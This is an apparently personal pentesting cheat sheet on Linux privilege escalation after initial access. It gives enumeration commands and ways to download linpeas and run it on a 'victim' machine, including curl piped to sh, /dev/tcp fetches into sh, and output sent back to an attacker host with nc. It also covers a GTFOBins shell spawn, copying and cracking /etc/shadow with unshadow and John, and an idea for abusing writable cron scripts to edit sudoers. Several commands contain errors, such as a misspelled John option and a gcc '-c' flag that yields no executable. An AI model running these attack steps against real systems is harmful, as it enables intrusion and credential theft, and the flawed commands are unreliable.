Privilege escalation

After exploitation - interesting cmd's

# Check installed FTP version
apt list --installed | grep ftp

# Check for locally open ports
netstat -antp | grep -i list

# Get SSH version on Linux
ssh -v localhost

# Get FTP daemon package version on Linux
dpkg -l pure-ftpd

# View OS related info
uname -a
lsb_release -a

Linpeass

Using tools like linpeas.sh automates the enumeration process, making it more efficient and comprehensive.

Download LinPeass rom github

curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh 

Transfer Linpeas to the victims machine

# Local network 
sudo python3 -m http.server 80 #Host 
curl 10.10.10.10/linpeas.sh | sh #Victim 

# Without curl 
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host 
cat < /dev/tcp/10.10.10.10/80 | sh #Victim 

Execute from memory and send output back to the host

nc -lvnp 9002 | tee linpeas.out #Host 
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim  

Analyze the Red findings

Go to GTFOBins

Type program that is a SUID and try things out, for example python sudo:

python -c 'import os; os.system("/bin/sh")'

CVE-2021-3493 - Ubuntu kernel priv escalation

Affected versions

Ubuntu 20.10

Ubuntu 20.04 LTS

Ubuntu 19.04

Ubuntu 18.04 LTS

Ubuntu 16.04 LTS

Ubuntu 14.04 ESM

If the target is one of the ubuntu version above, it will be affected by the Overlays privilege escalation vulnerability from which you can use the exploit below:

You have to complie the tool first with:

gcc -o exploit -c exploit.c  

Shadow File

1. Copy /etc/passwd

2. Copy /etc/shadow

3. Merge the files with unshadow tool

unshadow <passwdFile> <shadowFile> > <outputFileName>

1. Crack the passwords offline with John

john --worldlist=<wordlistFile> <UnshadowFile> 

DirtyCowl - 2016-5195

Check all executables that we can execute as sudo:

find / -perm 4000 2>/dev/null 

Once identified, try one of them, check the Gtfobins resource for available exploits

Check the sudo privileges we might have as current user:

sudo -l

If we can execute a binary with root privileges, we can check on gtfonbins how we can get root access through that executable

Check the crontabs

• If we can find a executable script where we can right, we might use it in order to add all users to /etc/sudoers